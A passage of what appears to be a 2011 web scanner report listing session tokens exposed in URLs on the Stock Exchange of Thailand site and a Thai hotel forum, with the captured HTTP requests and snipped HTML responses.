<td><a href="/set/newsdetails.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F0551NWS030520111816190696E.txt&amp;source=SET&amp;headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&amp;symbol=EARTH&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH &amp; resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...

12.50. http://www.set.or.th/static/news/latestnews_th_TH.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /static/news/latestnews_th_TH.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /static/news/latestnews_th_TH.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:34 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:47:00 GMT
ETag: "ccab2-2483-5fd17d00"
Accept-Ranges: bytes
Content-Length: 9347
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">
fun
...[SNIP]...
</a>
<a href="/set/todaynews.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?language=th&country=TH" target="_parent">..........</a> |
<a href="/set/newslistinput.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?language=th&country=TH" target="_parent">............</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?type=R&amp;time=1304426269000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490446T.txt&amp;source=SET&amp;headline=SET+News+%3A%B5%C5%D2%B4%CB%C5%D1%A1%B7%C3%D1%BE%C2%EC%CF+%E0%BB%D4%B4%B5%D1%C7+%22%BB%AF%D4%BA%D1%B5%D4%A1%D2%C3%BB%C5%B4%C5%E7%CD%A4%E0%BE%D7%E8%CD%CD%D4%CA%C3%C0%D2%BE%B7%D2%A7%A1%D2%C3%E0%A7%D4%B9%E3%B9+7+%C7%D1%B9%22&amp;symbol=SET&amp;language=th&amp;country=TH" target="_blank" class="indexleft">SET News :............... ....... &#034;......................................... 7 ...&#034;</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?type=R&amp;time=1304426046000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060107T.txt&amp;source=SET&amp;headline=SET+News+%3A%B5%C5%D2%B4%CB%C5%D1%A1%B7%C3%D1%BE%C2%EC%CF+%E0%BB%D4%B4%E1%A4%C1%E0%BB%AD+%22Broker+Wealth+Services%22+%A8%D1%BA%C1%D7%CD+26+%E2%BA%C3%A1%E0%A1%CD%C3%EC+%C3%E8%C7%C1+%E3%CB%E9%BA%C3%D4%A1%D2%C3%E0%CA%C3%D4%C1%A4%C7%D2%C1%C1%D1%E8%A7%A4%D1%E8%A7%A4%C3%BA%C7%A7%A8%C3&amp;symbol=SET&amp;language=th&amp;country=TH" target="_blank" class="indexleft">SET News :............... .......... &#034;Broker Wealth Services&#034; ...... 26 ......... .... .................................</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F8000NWS030520111816190760T.txt&amp;source=mai&amp;headline=%B5%C5%B7.%E3%CB%E9+EARTH+%BE%E9%B9%E0%CB%B5%D8%E0%BE%D4%A1%B6%CD%B9%E1%C5%D0%E3%CB%E9%AB%D7%E9%CD%A2%D2%C2%E3%B9%B5%C5%D2%B4%CB%C5%D1%A1%B7%C3%D1%BE%C2%EC+%E0%CD%E7%C1+%E0%CD+%E4%CD+%28mai%29+%B5%D1%E9%A7%E1%B5%E8+18+%BE.%A4.54&amp;symbol=mai&amp;language=th&amp;country=TH" target="_blank" class="indexleft">....... EARTH ........................................... .... .. .. (mai) ....... 18 ....54</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111816190799T.txt&amp;source=SET&amp;headline=%B5%C5%B7.%E3%CB%E9+EARTH+%BE%E9%B9%E0%CB%B5%D8%E0%BE%D4%A1%B6%CD%B9%E1%C5%D0%E3%CB%E9%AB%D7%E9%CD%A2%D2%C2%E3%B9%B5%C5%D2%B4%CB%C5%D1%A1%B7%C3%D1%BE%C2%EC+%E0%CD%E7%C1+%E0%CD+%E4%CD+%28mai%29+%B5%D1%E9%A7%E1%B5%E8+18+%BE.%A4.54&amp;symbol=SET&amp;language=th&amp;country=TH" target="_blank" class="indexleft">....... EARTH ........................................... .... .. .. (mai) ....... 18 ....54</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=832D721D2841EAE9F0C68B87149D9852?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F0551NWS030520111816190834T.txt&amp;source=SET&amp;headline=%B5%C5%B7.%E3%CB%E9+EARTH+%BE%E9%B9%E0%CB%B5%D8%E0%BE%D4%A1%B6%CD%B9%E1%C5%D0%E3%CB%E9%AB%D7%E9%CD%A2%D2%C2%E3%B9%B5%C5%D2%B4%CB%C5%D1%A1%B7%C3%D1%BE%C2%EC+%E0%CD%E7%C1+%E0%CD+%E4%CD+%28mai%29+%B5%D1%E9%A7%E1%B5%E8+18+%BE.%A4.54&amp;symbol=EARTH&amp;language=th&amp;country=TH" target="_blank" class="indexleft">....... EARTH ........................................... .... .. .. (mai) ....... 18 ....54</a>
...[SNIP]...

12.51. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.thailandhotelforums.com/forum/Themes/default/print.css?fin11" media="print" />
   <link rel="help" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=help" target="_blank" />
   <link rel="search" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=search" />
   <link rel="contents" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;" />
   <link rel="alternate" type="application/rss+xml" title="ThailandHotel Forum Thailand Travel Tourism Tourist Board - RSS" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;type=rss;action=.xml" /><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
...[SNIP]...
</b>. Please <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login">login</a> or <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=register">register</a>.<br />Did you miss your <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=activate">activation email?</a>
...[SNIP]...
<br /><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=register" target="_blank">Please apply to Join discussion</a>
...[SNIP]...
<form action="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=search2" method="post" accept-charset="TIS-620" style="margin: 0;">
                       <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=search;advanced"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/filter.gif" align="middle" style="margin: 0 1ex;" alt="" />
...[SNIP]...
<td valign="top" class="maintab_active_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;">Forum</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=help">Help</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=search">Search</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=calendar">Calendar</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=gallery">Gallery</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login">Login</a>
...[SNIP]...
<td valign="top" class="maintab_back">
                   <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=register">Register</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;" class="nav">ThailandHotel Forum Thailand Travel Tourism Tourist Board </a>
...[SNIP]...
<div class="catbg" style="padding: 5px 5px 5px 10px;">
               <a name="3" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;#3">Hotel and Travel Talk</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=13.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0" name="b13">General talk</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15969">jackytan</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=4315.msg8511#new" title="Re: travelling ">Re: travelling </a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=18.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=18.0" name="b18">Hotels Review</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15753">rollercoasten</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=3237.msg8511#new" title="Re: Taj Mahal of India - &quot;the epitome of love&quot;, ">Re: Taj Mahal of India -...</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=9.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=9.0" name="b9">Experience and Feedback </a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15065">johnnypattinson</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=93.msg8511#new" title="Re: hotels in bangkok, free internet service">Re: hotels in bangkok, f...</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=10.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=10.0" name="b10">Recommend interesting place </a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15879">johnallinclusive</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=58.msg8511#new" title="Re: 50 famous places in Thailand">Re: 50 famous places in ...</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=11.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=11.0" name="b11">Hotel worker talkative</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=14924">johnanderson</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=4604.msg8511#new" title="Re: Restaurant">Re: Restaurant</a>
...[SNIP]...
<div class="catbg" style="padding: 5px 5px 5px 10px;">
               <a name="4" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;#4">Website Promote Classifieds </a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=15.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=15.0" name="b15">Relevant Link Exchange</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15740">andres4r0</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=773.msg8511#new" title="Best choice for Mac users">Best choice for Mac user...</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=17.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=17.0" name="b17">Classifieds Promote Website</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15961">hotelchimi13</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=3123.msg8511#new" title="Re: ........................... .... lowseason .........">Re: .......................</a>
...[SNIP]...
<div class="catbg" style="padding: 5px 5px 5px 10px;">
               <a name="1" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;#1">Feedback Lifestyle and Joomla Support</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=16.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=16.0" name="b16">Joomla Support</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=1">admin</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=279.msg8511#new" title="Re: ThaiInterVDO plugin for joomla 1.5">Re: ThaiInterVDO plugin ...</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=1.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=1.0" name="b1">General Discussion</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15745">tom15smith</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=5456.msg8511#new" title="Re: Best TV channels">Re: Best TV channels</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=12.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=12.0" name="b12">Feedback</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=7908">lehoa</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=583.msg8511#new" title="Re: I try to put photo">Re: I try to put photo</a>
...[SNIP]...
<div class="catbg" style="padding: 5px 5px 5px 10px;">
               <a name="5" href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;#5">Thai Forums</a>
...[SNIP]...
<td class="windowbg" width="6%" align="center" valign="top"><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=unread;board=20.0"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/off.gif" alt="No New Posts" title="No New Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=20.0" name="b20">............</a>
...[SNIP]...
</b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=1">admin</a><br />
                       in <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6179.msg8511#new" title="........ ............. .. *9344 .......................................... ...">........ ............. ....</a>
...[SNIP]...
<td class="windowbg" width="20" valign="middle" align="center">
                       <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=recent"><img src="http://www.thailandhotelforums.com/forum/Themes/default/images/post/xx.gif" alt="Recent Posts" />
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=4315.msg8511;topicseen#msg8511">Re: travelling </a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15969">jackytan</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=472.msg8510;topicseen#msg8510">Re: Best place to shop in Thailand</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15966">shivam</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6169.msg8506;topicseen#msg8506">Re: Newbie here</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15966">shivam</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=773.msg8505;topicseen#msg8505">Best choice for Mac users</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15740">andres4r0</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=15.0">Relevant Link Exchange</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=3123.msg8504;topicseen#msg8504">Re: ........................... .... lowseason .........</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15961">hotelchimi13</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=17.0">Classifieds Promote Website</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6180.msg8495;topicseen#msg8495">Looking for Link Exchange</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15950">pusted</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=15.0">Relevant Link Exchange</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6179.msg8494;topicseen#msg8494">........ ............. .. *9344 .......................................... ...</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=1">admin</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=20.0">............</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=58.msg8484;topicseen#msg8484">Re: 50 famous places in Thailand</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15879">johnallinclusive</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=10.0">Recommend interesting place </a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6169.msg8483;topicseen#msg8483">Newbie here</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15879">johnallinclusive</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=134.msg8455;topicseen#msg8455">Re: Recommend for this &quot;SUMMER&quot; season in Thailand</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15432">Nattydee</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=10.0">Recommend interesting place </a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=3237.msg8449;topicseen#msg8449">Re: Taj Mahal of India - &quot;the epitome of love&quot;, </a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15753">rollercoasten</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=18.0">Hotels Review</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=5456.msg8448;topicseen#msg8448">Re: Best TV channels</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15745">tom15smith</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=1.0">General Discussion</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6141.msg8445;topicseen#msg8445">MOVED: New Introduction</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=1">admin</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=1.0">General Discussion</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6140.msg8444;topicseen#msg8444">New Introduction</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15712">Reid Wilson</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=13.0">General talk</a>
...[SNIP]...
<b><a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;topic=6137.msg8441;topicseen#msg8441">link exchange: Hotel MangoHill</a></b> by <a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=profile;u=15102">hotelmango</a> (<a href="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;board=15.0">Relevant Link Exchange</a>
...[SNIP]...
